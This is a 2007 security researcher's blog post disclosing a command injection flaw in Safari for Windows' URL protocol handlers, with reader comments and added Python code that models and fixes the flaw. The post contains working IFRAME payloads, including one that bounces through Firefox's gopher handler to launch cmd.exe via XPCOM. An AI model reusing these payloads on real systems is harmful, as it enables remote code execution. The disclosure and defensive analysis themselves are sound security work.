Apple released version 3 of their popular Safari web browser today, with the added twist of offering both an OS X and a Windows version. Given that Apple has had a lousy track record with security on OS X, in addition to a hostile attitude towards security researchers, a lot of people are expecting to see quite a number of vulnerabilities targeted towards this new Windows browser.
I downloaded and installed Safari for Windows 2 hours ago, when I started writing this, and I now have a fully functional command execution vulnerability, triggered without user interaction simply by visiting a web site. I will not sell this one to ZDI or iDefense but instead release it here, as I have done lately with a number of 0day vulnerabilities. This place is where you get my latest research.
A bunch of other security researchers such as David Maynor and Aviv Raff have been pounding safariWin with their fuzzing tools, going through thousands upon thousands of test pages in the hopes of triggering some form of memory corruption for potential exploitation. I am a big fan of fuzzing and believe it can produce some tremendous results, but sometimes good old-fashioned application specific knowledge can get you far.
The logic behind this vulnerability is quite simple and the vulnerability class has been known and understood for years, namely that of protocol handler command injection. A browser typically supports a multitude of different URL schemes, some of which are handled by internal functions and others that are handed off to external applications. On the OS X platform Apple has enjoyed the same luxury and the same curse as Internet Explorer has had on the Windows platform, namely intimate operating system knowledge. The integration with the originally intended operating system is tightly defined, but the breadth of knowledge is crippled when the software is released on other systems, and mistakes and mishaps occur. You can still find references to the OS X proprietary URL protocols open-help-anchor: and network-diagnostics: inside the resource files for the Windows release.
URL protocol handlers on the Windows platform work by executing a process with specific command line arguments. When Apple released Safari for the Windows platform they neglected to implement a proper level of input validation for these arguments, which means that you can break out of the intended confines and wreak havoc. A typical request for a URL such as myprotocol://someserver.com/someargument would be turned into a command line resembling the following.
"C:\Program Files\My Application\myprotocol.exe" "someserver.com/someargument"
This works almost as expected in Safari. With a simple link you cannot pass arbitrary characters along to the command line that is later executed; most attempts at doing so will simply be URL-escaped, such that myprotocol://someserver.com/some"[SPACE]argument is turned into
"C:\Program Files\My Application\myprotocol.exe" "someserver.com/some"%20argument
This cannot be used to exploit Safari as the command line to be executed is simply invalid. However, Safari does not properly validate the input when these same requests are handled through IFRAME elements, such as
<iframe src='myprotocol://someserver.com" < foo > bar | foobar "arg1'></iframe>
which is turned into the following command line.
"C:\Program Files\My Application\myprotocol.exe" "someserver.com" < foo > bar | foobar "arg1"
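As an added illustration (not code from the post or from Safari), here is a Python model of the handler launch described above. It pastes the raw URL into a constructed handler registration template the way the post says Safari did, splits the result with the MS C runtime's own command-line rules to show which argv the handler really receives (no shell runs, yet the handler still gets extra caller-controlled arguments), and then shows the fix: refuse characters that can never appear in a URL and quote the argument properly. The template, the hostile URL and the percent-encoded URL are constructed for the demo.

```python
import re

# What HKCR\myprotocol\shell\open\command would hold for the post's hypothetical
# handler: the executable path plus a quoted "%1" placeholder that Windows fills
# with the URL. (Constructed registration; the path is the post's example.)
HANDLER_TEMPLATE = '"C:\\Program Files\\My Application\\myprotocol.exe" "%1"'

# The URL the post's IFRAME smuggles through (constructed): a quote closes the
# placeholder early and everything after it becomes extra command-line tokens.
HOSTILE_URL = 'someserver.com" < foo > bar | foobar "arg1'
# The same characters as a browser should emit them: percent-encoded.
ENCODED_URL = "someserver.com/some%22%20argument"

def build_cmdline_vulnerable(template, url):
    """The failure the post describes: paste the raw URL into %1 with no
    validation or escaping, so quotes and whitespace in it stay live."""
    return template.replace("%1", url)

def parse_windows_cmdline(cmdline):
    """Split a command line the way the MS C runtime / CommandLineToArgvW does
    (whitespace delimits, "..." groups, a backslash escapes only a following
    quote), to show which argv the handler really receives. No shell runs, so
    '<', '>' and '|' are simply handed over as further arguments."""
    args, cur, in_quotes, have_arg = [], [], False, False
    i, n = 0, len(cmdline)
    while i < n:
        ch = cmdline[i]
        if ch == "\\":
            j = i
            while j < n and cmdline[j] == "\\":
                j += 1
            run = j - i
            if j < n and cmdline[j] == '"':
                cur.append("\\" * (run // 2))  # each pair yields one backslash
                if run % 2:                    # odd run: the quote is literal
                    cur.append('"')
                    j += 1
            else:
                cur.append("\\" * run)         # backslashes alone are literal
            i, have_arg = j, True
        elif ch == '"':
            in_quotes, have_arg = not in_quotes, True
            i += 1
        elif ch in " \t" and not in_quotes:
            if have_arg:
                args.append("".join(cur))
                cur, have_arg = [], False
            i += 1
        else:
            cur.append(ch)
            have_arg = True
            i += 1
    if have_arg:
        args.append("".join(cur))
    return args

# RFC 3986 URL alphabet (unreserved + reserved + '%'). A raw quote, space,
# '<', '>' or '|' can never occur in a URL, so the launcher may refuse them.
_URL_ALPHABET = re.compile(r"^[A-Za-z0-9\-._~:/?#\[\]@!$&'()*+,;=%]+$")

def is_url_alphabet(url):
    return bool(_URL_ALPHABET.match(url))

def quote_windows_arg(arg):
    """Quote one argument so parse_windows_cmdline() returns it unchanged:
    backslashes before a quote are doubled, quotes get a backslash, and the
    whole thing is wrapped in quotes."""
    out, pending = [], 0
    for ch in arg:
        if ch == "\\":
            pending += 1
        elif ch == '"':
            out.append("\\" * (pending * 2 + 1) + '"')
            pending = 0
        else:
            out.append("\\" * pending + ch)
            pending = 0
    out.append("\\" * (pending * 2))  # a trailing run must not eat the closing quote
    return '"' + "".join(out) + '"'

def build_cmdline_fixed(template, url):
    """Defence in depth: refuse anything outside the URL alphabet, then quote
    the argument properly in case the registered template's quoting is wrong."""
    if not is_url_alphabet(url):
        raise ValueError("URL contains characters that are never legal in a URL")
    return template.replace('"%1"', quote_windows_arg(url))

def fixed_rejects(template, url):
    """True when the hardened builder refuses the URL."""
    try:
        build_cmdline_fixed(template, url)
    except ValueError:
        return True
    return False
```

Run parse_windows_cmdline() over the vulnerable command line and the handler receives nine arguments instead of two; the hardened builder refuses the hostile URL outright and passes the percent-encoded one through as a single argument.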
As the knowledgeable reader might have noticed, we now have everything we need to implement an attack against the entire range of available URL protocol handlers on the Windows platform. We could pick the telnet or callto protocols and provide unfiltered input to an argument of our choice. For this demonstration I have opted to attempt an exploit against the gopher: URL protocol, which is handled by my local Firefox installation. Let's hash together an example request:
<iframe src='gopher://larholm.com" |cmd /c echo "FOO'></iframe>
Fire up procexp, launch Safari and watch the output:
"C:\PROGRA~1\MOZILL~3\FIREFOX.EXE" -url "gopher://larholm.com" |cmd /c echo "FOO" -requestPending
Now this might be fun enough, but what if we wanted something a bit more customizable? Firefox is built on top of the Mozilla XPCOM platform and we might as well use some of these capable interfaces at our disposal to handle process instantiation. The code we want to execute is the following.
C=Components.classes;I=Components.interfaces;
file=C['@mozilla.org/file/local;1'].createInstance(I.nsILocalFile);
file.initWithPath('C:\\windows\\system32\\cmd.exe');
process=C['@mozilla.org/process/util;1'].createInstance(I.nsIProcess);
process.init(file);
process.run(true,{},0);
alert(process);
Due to the levels of URL escaping the following might be a bit confusing to read, but feel free to dissect it for your own variations.
<iframe src='gopher://larholm.com" -chrome "javascript:C=Components.classes;I=Components.interfaces;
file=C['@mozilla.org/file/local;1'].createInstance(I.nsILocalFile);
file.initWithPath('C:'+String.fromCharCode(92)
+String.fromCharCode(92)+'Windows'
+String.fromCharCode(92)+String.fromCharCode(92)+'System32'
+String.fromCharCode(92)+String.fromCharCode(92)+'cmd.exe');
process=C['@mozilla.org/process/util;1'].createInstance(I.nsIProcess);
process.init(file);
process.run(true,{},0);alert(process)'></iframe>
And there you have it, command execution. A fully functional PoC exploit is located below. Warning: This WILL crash your Safari browser on Windows. Close any existing Firefox processes that you might currently be running, then navigate Safari to the following page.
http://www.larholm.com/vuln/safaripoc.html
The above PoC exploit will exploit Safari by bouncing through Firefox via the Gopher protocol, passing on unfiltered input for the -chrome argument that Firefox exposes. When it has done this it will launch C:\Windows\System32\cmd.exe with any arguments that have been specified in the call to the process.run method.
It is important to know that, even though this PoC exploit uses Firefox, the actual vulnerability is the lack of input validation for the command line arguments handed to the various URL protocol handlers on your machine. As such, there are a lot of different attack vectors for this vulnerability; I simply chose Firefox and the Gopher URL protocol because I was familiar with these.
I hope you enjoyed the fruits of my 2 hours of labour. Please feel free to add my RSS feed to your reader and come back again tomorrow or next week for a fresh batch of 0day vulnerabilities.
Cheers
Thor Larholm
UPDATE
The site was down for a couple of hours due to Slashdot, TechMeme and Reddit.

You might want to consider disabling the smart quote BS for posts that contain code fragments, as it is sort of hard to decipher what “C:\PROGRA~1\MOZILL~3\FIREFOX.EXE” -url “gopher://larholm.com” |cmd /c echo “FOO” results in - e.g. what happens to the cmd that is unmentioned in the accompanying text…
[...] Bah. Hardly a day has gone by and the bugs are coming out to roost. Larholm.com - Me, myself and I ? Safari for Windows, 0day exploit in 2 hours And here is one from Maynor (the guy who Apple vilified). He says he isn’t going to report [...]
Yes, Windows sucks. No safety at all.
It’s not clear to me whether one should ding the browser or the OS for this one. OS X has the same problem, albeit with the potential at least of being somewhat safer as the normal UNIX “exec” runs programs without passing through shell argument evaluation.
It should not be the browser’s responsibility to keep track of which applications are safe to use as protocol handlers and which should be avoided. Either the operating system needs to provide an API for finding or calling protocol handlers that are designed to handle untrusted requests, or the browser should maintain its own database of such safe protocol handlers and ignore the database provided by the operating system.
I suggested that this be fixed on OS X, at least, back in 2004: http://www.scarydevil.com/~peter/io/osx-security.html
Of course, Microsoft’s been sitting on far more serious design flaws since 1997, so I honestly don’t expect Apple to act on this one until at LEAST the end of the decade. If at all.
[...] well, I don't see any reason to replace FF. It crashed a couple of times already.. Larholm.com - Me, myself and I ? Safari for Windows, 0day exploit in 2 hours Safari for Windows: Released and hacked in a day | InfoWorld | News | 2007-06-11 | By Robert [...]
[...] according to here and here (found via Slashdot), just hours after its release the Windows version already had 4 DoS bugs [...]
[...] before using this product on Windows, it would be a good idea to read the article that says he managed to find a bug in Safari for Windows within 2 hours of its release. If you're still in doubt, better wait for a patch from Apple (oh, and on a MacBook a "patch" [...]
I don’t know, the way you described it seems more like a hole in the way Windows handles things than a Safari hole. Does a Windows API call launch a shell process, or does Safari manually go and run a command line program? If it’s the Windows API for URL handling, then it’s clearly broken. Every program that needs to grab a URL should not be responsible for patching holes in Windows.
[...] 2: Thor Larholm has discovered a 0 day exploit in Safari within 2 hours of installing. Posted by Funtime on Tuesday, June 12, 2007, at 12:00 [...]
Nice work! Both the thorough description and the fact that you decided to reveal it rather than just saying “nah-nah Apple, I pwnd ur borwser”. Should be interesting to see their reaction (and reaction time) on this.
Wow, amazing
I don’t like Safari on XP anyway, some pages don’t even render correctly… whatever. Thanks for the tip, I’m staying on Opera 
[...] ". Same way of acting, different person: two hours after the release, Thor Larholm published an interesting article in which he shows how Safari is affected by a vulnerability of the class "URL protocol handler command [...]
[...] Maybe if I read this beforehand I would have second thought about installing it… or maybe not. [...]
really good stuff, thanks for your effort. Safari wasn’t careful enough to filter out improper inputs.. and you proved it. Cheers!
safaripoc.html crashes Safari 3 on Mac OS X too
[...] Thor Larholm found a bug that lets attackers execute arbitrary program code and thereby gain control over someone else's Windows system. All it takes is visiting a prepared web page. [...]
Your exploit crashes Safari 3 beta on the Mac too (and opens Firefox)
[...] Errata Security managed to find 6 bugs in one afternoon, one of which they were able to weaponize. Thor Larholm has created a means of remote executing any code he desires, in a mere 2 [...]
[...] on the other hand Thor Larholm found a code injection vulnerability in the URL protocol handler, which also allows remote execution of [...]
[...] Two hours in, the first exploit appeared. [...]
Well… I’m not very surprised about this exploit - it’s a beta. But on the other hand it suckz a lot that Apple released it that early. I wouldn’t recommend installing it anyway on Windows until it’s final.
[...] Safari coming to Windows (but apparently it has serious security-flaws in its current state. More about that here, here and here). [...]
[...] the same time Thor Larholm found a URL protocol handler command injection [...]
[...] give it a whirl—if you have the time and the system resources. Always be on the lookout for security threats, [...]
it crashes safari on the mac as well
Apple software just works, doesn't it?
Safari 3 Beta for Windows XP & Vista…
I prefer to wait for the final release version in October to know whether Safari is the faster web browser. For the time being, I'll use a Safari theme on Firefox…
[...] has released a brand new version of their Safari browser, and it only took 2 hours for someone to hack an exploit out for it. There are some good reviews around as to what makes the software so compelling, but you [...]
It doesn’t crash Safari 2.0.4 (latest) on the Mac, but it opens Firefox nonetheless.
[...] just 2 hours is all it took until the first security hole in the Windows version of Safari 3 was found. And then someone still says Apple software [...]
[...] 4: Thor Larholm has also found a bug. http://larholm.com/2007/06/12/safari-for-windows-0day-exploit-in-2-hours/ I’d like to note that we found a total of 6 bugs in an afternoon, 4 DoS and 2 remote code [...]
[...] No sooner do I mention Safari on Windows and Niall goes off and finds someone’s zero day exploit [...]
[...] 12 June 2007: Several security vulnerabilities have already been identified in the Safari/PC beta, so if you are [...]
Mmhh, there is an EULA
IMPORTANT NOTE: THIS IS “BETA”, PRE-RELEASE, TIME-LIMITED SOFTWARE MEANT FOR EVALUATION AND DEVELOPMENT PURPOSES ONLY. THIS SOFTWARE SHOULD NOT BE USED IN A COMMERCIAL OPERATING ENVIRONMENT OR WITH IMPORTANT DATA. BEFORE INSTALLING THIS APPLE SOFTWARE, YOU SHOULD BACK UP ALL OF YOUR DATA AND REGULARLY BACK UP DATA WHILE USING THIS APPLE SOFTWARE.
Which pretty much implies it is risky to use the software. I usually do not see this in the standard software downloads.
They call it beta?
They will be thankful for your testing, even though they will not answer you. Free job for Apple you do?
Not that I am against you. Just pointing out my feelings.
Pedro.
[…] security hole found in the Windows version of Safari, Apple is insecure […]
EULAs are there to cover themselves legally (which is good sense) but when you read the marketing drivel.
“Now you can enjoy worry-free web browsing on any computer. Apple engineers designed Safari to be secure from day one.”
they are kinda asking for it.
[...] (left) has released an advisory with proof-of-concept code to demo the vulnerability, which can be used to take complete control of [...]
Hey, fine to know that my Safari is running on OS X, which is the most secure Operating System ever!!!!
NOT!!!
Only Jobs wannabe fanboys will even try this.
Who gives a flying xxxx what apple does?
[...] Aviv Raff was the first. Then it was David Maynor's and Thor Larholm's turn.. [...]
[...] vulnerabilities (4 of the DoS type and 2 remote execution) a few hours after launch. Confirmation comes from several mutually independent sources, confirming the truth of the news that Safari for Windows was not born [...]
[...] Report: security bugs in Apple's browser Safari for Windows XP and Windows Vista: Link. Link to the security expert: Thor Larholm. Link to the Apple Safari exploit: Link [...]
[...] veteran security researcher Thor Larholm writes in his blog he found a 0day vulnerability within two hours. The flaw exists within how Safari handles URL [...]
[...] Well, the Safari browser for Windows was released yesterday and so far in less than 24 hours there have been several bugs discovered. (ex. 2) (ex. 3) [...]
[...] but especially the security holes, which are glaring under Windows. Thor Larholm, for instance, managed after just 2 hours to find a hole through which attackers can run arbitrary code on the system [...]
[...] Larholm has published a 0day exploit that causes Safari to shut down when visiting a site with malicious [...]
[...] Thor Larholm who described himself as “a pretty ordinary guy from a small town in Denmark”, also downloaded and installed Safari for Windows on his PC. After a few hours of testing he found a serious bug: “I now have a fully functional command execution vulnerability, triggered without user interaction simply by visiting a web site.” [...]
[...] Already someone has found a massive hole in Safari. Read more about it at larholm.com [...]
[...] already 6 zero day exploits and many, many crashes for the browser. You can read about them here here here and here. Which makes the following image from the Apple website, borrowed from [...]
[...] Oh, Safari? Yes! Safari 3 naturally comes with Mac OS X 10.5 and also for Windows XP and Vista. Available right away as a snapshot (officially a public beta) for download on Windows. Still very unstable, though, and crashes as soon as you open Google… apparently there are problems with the German language or fonts. Security holes were also found in Safari for Windows just 2 hours later. [...]
[...] a beta of Safari for Windows (I knew it! They’re porting iLife to Windows.). Guess what. Someone found a security exploit in only two hours. Can you believe that? Oh well, it’s a beta after all. [...]
[...] Aviv Raff, through basic security tests, found a memory corruption flaw that can be exploited by malicious users. And that's not all: a few hours later, more flaws were discovered. [...]
[...] Finally, a warning to users, particularly those on Windows Vista, who do manage to get this Safari beta installed and working: it seems security leaves a great deal to be desired! [...]
Good research, but what’s with this “lousy track record” and “hostile to exploits” BS? Come on man, lose the chip on the shoulder - it just looks unprofessional.
[...] Raff (Bugtraq ID: 24431). Apple Safari for Windows Memory Corruption Vulnerability by David Maynor. Apple Safari for Windows URL Protocol Handler Command Injection by Thor [...]
[...] Kriptópolis I read that in only two hours Thor Larholm has cracked Safari 3 for Windows open, after finding that this browser does not properly validate the input it receives through [...] elements
[...] reports indicating that the browser presents a security risk to Windows users. Thor Larholm has published a 0day exploit that causes Safari to shut down when visiting a site with malicious [...]
[...] security researcher Thor Larholm wrote in his blog that he found a “0day” vulnerability in Safari within two hours. The flaw exists in how [...]
[...] the new browser, officially still on beta-3, may not be as good as others. A zero-day exploit was revealed in a mere two hours. Another bug was also discovered within a short period. These make IE look [...]
[...] people have not only found major bugs (which is expected from a beta), but also possibly exploitable bugs that could have major security [...]
[...] famous crashes and two allowing remote code execution. Since there's no two without three, Thor Larholm (whose blog I can't open at the time of this post) focused on exactly the same [...]
[...] Webbrowser now publicly available for beta testing. Some people downloaded it and it took them 2 hours to find a serious security hole which lets Safari execute any program you’d like. [...]
[...] getting some criticism over security flaws made not so far after the release. Thor Larholm found a 0 day exploit that causes Safari to shut down whenever you visit a website containing the malicious code. David [...]
[...] of Safari for Windows that would allow remote code execution. Likewise Thor Larholm found yet another one. It seems the Cupertino folks didn't have much time to validate the security of the new [...]
[...] Maynor reports 6 bugs discovered in a few hours, 4 of them DoS and 2 remote execution, while Thor Larholm has published an exploit that closes the browser when visiting a page that exploits a further [...]
[...] its release, there are already exploits circulating for Safari for Windows. Thor Larholm has discovered a remote command execution vulnerability and some other researchers have reportedly discovered more [...]
[...] Safari on Windows for a long time and it isn't that stable. It seems it isn't very secure either, given that Thor Larholm found, only two hours after launch, a [...]
[...] for full coverage. The main thing now is the bugs discovered in Safari for Windows. Tor Larholm at larholm.com found two within hours after the speech. David Maynor at Errata Security found six. At [...]
[...] keeping track of a few announcements across the web, including a fully disclosed 0-day exploit that Thor Larholm apparently found yesterday within two hours of the software’s release (and says more are [...]
[...] was released. David found 4 DoS bugs and 2 remote execution vulnerabilities, meanwhile Thor found a URL protocol handler command injection vulnerability that allows remote command execution and he wrote it with a full description of the bug. If you [...]
[...] An exploit has been found in the beta. Don’t use this for casual [...]
[...] 2 Besides rendering errors, bug reports are now piling up as well. Thor Larholm claims to have a 0day exploit for Safari 3 just two hours after the release [...]
Breaking stuff again, eh? :p
[...] hours later, Thor Larholm found a vulnerability which allows command execution to be run [...]
that's why I like Firefox
jenny
http://www.spaml.com
Given that Apple has had a lousy track record with security on OS X
Then why is it, dipstick, that absolutely none of the security problems that plague Microsoft’s products plague OS X if their track record is so “lousy”?
No, I don’t expect an actual answer.
[...] released its Safari browser for Windows today and already there are some security issues with the beta version. We hope this does not start browser wars all over [...]
the OS is irrelevant in this instance IMHO. utilising user-supplied data, unfiltered and unverified, is pure and simple bad form. blaming the OS in this case is like blaming the browser for an XSS attack on a badly written php forum in my opinion.
[...] course, day one is always amusing. First, it’s clear that the security claims are not fully justified. And moving from the confines of the OSX world, which is generally [...]
nice..
tom
yes, it’s a beta, but it behaves like a pre-alpha nightly. first bugs i saw within less than a minute: “show all bookmarks” -> crash; preferences are not saved; auto-hidden windows taskbar isn’t allowed to pop up over maximized safari; some elements of web pages are just not displayed. of course the vulnerabilities are much worse than these stupid bugs, but you don’t see them at first glance. they just shouldn’t have gone public with this.
Oh, so the guy who misrepresented the Airport issue found and reported eight problems within six hours of Safariwin’s release. Could someone wake me when he either publicly documents it so it can be verified or some other researcher finds anything remotely similar?
Most of these are crashers. Finding something that can cause a beta application to crash isn’t unexpected. Let's also note the source of these “vulnerabilities”: this is the guy who faked hacking a Mac and refuses to give Apple any information on these bugs. This is someone with a grudge trying to smear Apple because Apple exposed his previous scam.
Playing the “we don’t inform the vendor if we think the vendor spins things” for beta software is, uh, what is the word…. spin.
It’s Beta software, if you use it, expect bugs, and when you find them, report them like a good kid. You people aren’t downloading the beta expecting to use some free piece of software, expecting perfection and never having to actually beta test, are you?
Bugs are exactly what Apple wanted to expose.
The point of having a beta is so that people can find all these holes and bugs, report back to apple, and then apple fix them. If the final version comes out and its still crappy, then b**** and moan but give me a break. I’m not taking any security complaints seriously until then. Stop making such a big deal over an unfinished product.
[...] researcher Thor Larholm wrapped up Safari’s opening day with the most damaging disclosure of all: A remote execution vulnerability accompanied by proof-of-concept exploit code. That code — [...]
100th POST XD NICE
France edu
Peter da Silva said “It’s not clear to me whether one should ding the browser or the OS for this one. OS X has the same problem, albeit with the potential at least of being somewhat safer as the normal UNIX “exec” runs programs without passing through shell argument evaluation. It should not be the browser’s responsibility to keep track of which applications are safe to use as protocol handlers and which should be avoided. Either the operating system needs to provide an API for finding or calling protocol handlers that are designed to handle untrusted requests, or the browser should maintain its own database of such safe protocol handlers and ignore the database provided by the operating system.”
You’d hope (well, “expect” actually) that a developer who trumpets as the twelfth reason to love their new browser as “Security. Now you can enjoy worry-free web browsing on any computer. Apple engineers designed Safari to be secure from day one.” would have had the wit to make such an assessment as you just did, presumably in a few minutes of thinking about these issues, before they publicly released any code. After all, as you point out, deciding how to (or even whether to) pass-off handling of external protocols is necessarily a risky operation in the design of any browser, especially when doing so cross-platform, and any marginally security-clueful developer is surely aware of that (and I guess this all means that Apple’s Safari developers are NOW aware of it).
And the extensive use of fuzzing of late is also surely well-known to any marginally security-clueful developer (and NOW to Apple’s Safari developers).
The plethora of nasty, and mostly pretty basic, security bugs found so quickly within the release of Safari for Windows makes one seriously question what kind of security Apple’s engineers designed in “from day one”.
It also makes me wonder how many more have been found and NOT publicly reported. Much as the fan boyz are whining about these discoveries, SMART Apple users will be recovering from a brown alert moment about now…
[...] Aviv Raff , David Maynor, and Thor Larholm all reported flaws in the browser shortly after it was made available on Monday. Maynor alone said [...]
[...] (13/6/07) : An 0day exploit has been found on this [...]
Your post is rather deceptive.
The way you present it, you imply that the lack of filtering allows you to feed data to the cmd.exe shell interpreter. This is incorrect and you know it.
The process set up by the URL handler is executed directly, with the arguments specified, but at no time are the arguments interpreted by a shell. Thus the |& etc shell metacharacters have no effect.
The real exploit is that it is possible to call URL handlers with arguments that make them do unexpected things. Whether this exploit is in Safari or the URL handler mechanism is open to debate.
It’s trivial to fix this on the URL handler side, for instance: register the URL handler such that it treats the rest of its command arguments as a single URL, instead of parsing it as actual arguments. Considering that URL handlers are meant to be hyperlinked, which typically means being called by remote methods, I’d say it’s up to them to handle security properly. That means the real exploit you present here is Firefox’s lousy URL handler registration.
Given that this same issue may apply to several URL handlers makes it more complicated than that, of course.
But for crying out loud, don’t add sensationalist crap that obscures the real nature of important exploits! If you wish to be treated like a professional at all, you owe it to your readers to update this post to make it clear that the shell is not involved.
[...] Larholm has already found an exploit for it too, one that allows code execution [...]
[...] browser) for Windows, according to the Inquirer there is already an exploit for it. According to Larholm it only took 2 hours to figure out the exploit. I highly recommend that people look at his site [...]
[...] SpOn: Safari for Windows hacked. Thor Larholm, a hobby hacker from Denmark, claims to have discovered a first sore spot just two hours after downloading Safari for Windows. [...]
Too hard for Safari, I hoped that it would be better than all the other browsers… but still it didn’t
[...] Indeed, many more hours of testing lie ahead of us, which admittedly helps secure my job but also means boring and unloved work. The Debug menu, which can also be activated under Windows, could help with that. And with this beta Apple has straight away delivered proof that Safari on Windows is not to be equated with Safari on Mac. On the other hand, in my opinion Apple is getting used to the Windows world a little too quickly: the first security holes were found on the very first day. [...]
Windows sucks…that's it…software running on winblows will always be insecure….but there will always be fools in this world who just don't listen ;O)
p.s Larholm=sucks
[...] hours of its release by Dave Maynor (Dave has further links in his article), and another by Thor Larholm. Thor's explanation of what’s happening is in depth and unbiased. Basically, Apple don’t [...]
Ken, I approved your comment unedited so that I could clear up some misunderstandings. I am not David Maynor (the Airport guy) and I did not work together with Maynor to find this vulnerability. Maynor simply accredited me on his blog for also finding holes in Safari.
Maynor claims to have found some memory corruption problems through fuzzing. This vulnerability is completely separate and I did not use fuzzing to find it.
I have also chosen to publish all the technical details for this vulnerability together with a working Proof-of-Concept exploit, so that you may independently verify the vulnerability.
Regards
Thor Larholm
Random Reader from Comment 110, I published the PoC exploit so that you could independently verify the operation of this vulnerability. Firefox is just one of many attack vectors.
The lack of input validation occurs before Firefox is ever launched, something which you can verify even with Process Explorer. Launch the exploit, right-click firefox.exe in procexp, pick properties, select the Image tab and look at the second line called “Command line:”.
You will notice that Safari has not treated the rest of the command argument as a single URL, simply because it does not filter out quotes and whitespace. As such, we can affect the command line used to launch the URL handler executable.
Regards
Thor Larholm
Mike from Comment 118, this vulnerability is not caused by any failings in Windows but by a lack of input validation in the Safari code. It’s the Safari executable that chose to execute a command line without filtering the input.
Regards
Thor Larholm
Very interesting article, and again I am impressed by the work of Larholm.
Then I made the mistake and began to read the comments. Please guys, before commenting on the article,
1) read it again so you know what Larholm says and what you just thought he said, or what others have said
2) if you don’t care about Apple, Safari or security in browsers, a comment probably isn’t necessary
3) there are only two Apple ‘bashings’ in Larholm’s article:
a) “Given that Apple has had a lousy track record with security on OS X…” doesn’t mean that Larholm actually says it’s worse than other companies on other operating systems
b) “…in addition to a hostile attitude towards security researchers” is quite interesting, but if your reaction to anyone saying something bad about Apple or Apple products is to instinctively hit back then you are probably not thinking straight - consider waiting 24 hours before posting your response
4) sure it’s beta - now, thanks to all these guys finding (most of) the vulnerabilities Apple can fix them before it’s ready to ship to consumers
I’m probably not going to use Safari, except for testing purposes, but I am grateful there’s a chance it could be secure. Now.
[...] code. Thor Larholm found another vulnerability of the same type (remote code execution) through the URL protocol handler. In addition, some pages (see the Google search results, barrapunto, [...]
Thanks for responding Thor.
> You will notice that Safari has not treated the rest of the command argument as a single URL, simply because it does not filter out quotes and whitespace. As such, we can affect the command line used to launch the URL handler executable.
Yes, I’m not arguing against that. What I meant about fixing this on the URL handler side is that the target process should treat the command line arguments properly. It did, after all, register itself as a URL handler. Part of that registration allows it to specify any arguments it wants prior to the caller’s arguments. Since Firefox already registered its handler to place “-url” just before the caller’s argument, when it processes the command line it can simply treat everything after “-url” as a single argument (sort of like the “–” convention for some GNU tools).
[ On Windows, it's actually up to the application to parse the commandline arguments how it likes -- the typical argc/argv convention, quote handling etc is handled by the C runtime or other language-specific library, not the OS itself. Windows' native GetCommandLine() returns a single string. ]
Or it could just register for DDE use and bypass the command line parsing issue entirely, like most of the URL protocol handlers on my machine at the moment. IE is not usable as a target for this particular exploit because of this.
My major point is just that the shell is not involved. My minor point is that the URL handler should treat input securely, though I am conceding that a lot of handlers probably don’t, which makes this less simple than “not Safari’s fault”. Obviously Safari needs to address this, since it’s now a known attack vector that it can mitigate.
The Firefox guys could easily prevent themselves from being exploited by anything this way though, as can any app that registers URL protocol handlers.
[...] However, not everything is a bed of roses. iTunes is an application that consumes a lot of memory, and some users are complaining that Safari on Vista consumes up to 150MB of memory. What’s more, there are flaws everywhere; bugs have been detected by David Maynor, the young man who programmed the Airport hack, and by Thor Larholm, who released a series of exploits. [...]
Hm, smart dashes. The GNU tool convention I was referring to is the “double dash” signal to ignore options on the rest of the command line, in case any remaining arguments begin with a dash.
Since Safari crashes while attempting to load its homepage on my Compaq, I don’t think exploits are going to be an issue. Gotta be able to run to be exploited, right?
Random Reader, I can definitely understand your point of view. It would be more prudent if Firefox had registered its URL protocol handlers for use through DDE. However, even the telnet: protocol handler that is registered by Microsoft is called by Safari through unfiltered command line arguments.
When Safari chooses to invoke external applications with a command line, protocol handler or not, it should filter the input appropriately. It cannot be the responsibility of third party applications to control how they are invoked, especially when those applications have a wide range of possible command line arguments that can be specified in any order.
Firefox has already designated where it wants the input when called as the gopher handler application, namely ‘Firefox.exe -url "%1" -requestPending’, and it’s not exactly rocket science for Safari to keep any arbitrary input inside those quotes.
Safari also forgets to filter the input for command line arguments on OS X in some other scenarios that I will probably detail soon.
Regards
Thor Larholm
[...] bugs, 2 Remote Execution vulnerabilities by David Maynor (known for his Apple Wi-Fi hack) and a URL protocol handler command injection vulnerability that allows remote command execution by Thor [...]
Actually, if Safari is doing this right, it’s using ShellExecute() to do the work. In this case it doesn’t actually know whether it’s a command line, a DDE conversation, or something else entirely.
(This is just to say that it can’t actually know what Firefox wants; I’m not making any particular argument with this comment.)
[...] was zeroed in 2 hours of Safari’s release! The credit goes to Thor Larholm, who wrote in his post Safari for Windows, 0day exploit in 2 hours …. The logic behind this vulnerability is quite simple and the vulnerability class has been [...]
I hope Apple can fix this when they release the ‘Real’ version.
Something else just occurred to me, something I lost sight of while thinking about command lines and such. URLs have a specific allowed character set and everything else must be escaped, right? Ignoring all the other points for a moment, invalid URLs are being passed around here.
That puts this issue squarely on Safari, even with my other arguments.
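The two points made in this thread, that Safari drops unfiltered quotes and whitespace into the handler’s command line (Thor’s comment above) and that such characters are not legal in a URL at all (Random Reader’s point), can be shown with a small script. This is an added example, not code from the post, from Apple or from Mozilla: it assumes the Firefox-style handler template ‘Firefox.exe -url "%1" -requestPending’ quoted in the thread, reimplements the Microsoft C runtime’s argv splitting rules so the effect is visible without launching anything, and uses a made-up, non-functional flag name `-injected-flag` as the constructed sample input. Two defender-side fixes are shown: refuse any URL with characters outside the RFC 3986 set, or percent-encode them so the value can never leave the quotes.

```python
"""Added example: how an unfiltered URL changes the argv a Windows protocol
handler receives, plus two fixes a browser can apply before calling the
handler. Assumes the Firefox-style template quoted in the thread; the flag
'-injected-flag' is a made-up, non-functional name used only as sample input."""
import re
from urllib.parse import quote

# Handler command template as quoted in the discussion (registry-style %1).
HANDLER_TEMPLATE = 'Firefox.exe -url "%1" -requestPending'

# Constructed sample inputs.
BENIGN_URL = "gopher://example.test/"
INJECTED_URL = 'gopher://example.test/" -injected-flag "'  # quote + whitespace


def split_windows_args(cmdline: str) -> list[str]:
    """Split a command line the way the Microsoft C runtime builds argv
    (the CommandLineToArgvW rules): whitespace separates arguments unless
    inside double quotes, a double quote toggles quoted mode, and backslashes
    are literal unless they precede a quote (2n -> n backslashes, 2n+1 -> n
    backslashes plus a literal quote). The post-2008 '""' rule is omitted."""
    args, cur, in_quotes, have_arg = [], [], False, False
    i, n = 0, len(cmdline)
    while i < n:
        c = cmdline[i]
        if c == "\\":
            j = i
            while j < n and cmdline[j] == "\\":
                j += 1
            nb = j - i
            if j < n and cmdline[j] == '"':
                cur.append("\\" * (nb // 2))
                if nb % 2 == 1:          # odd count: escaped literal quote
                    cur.append('"')
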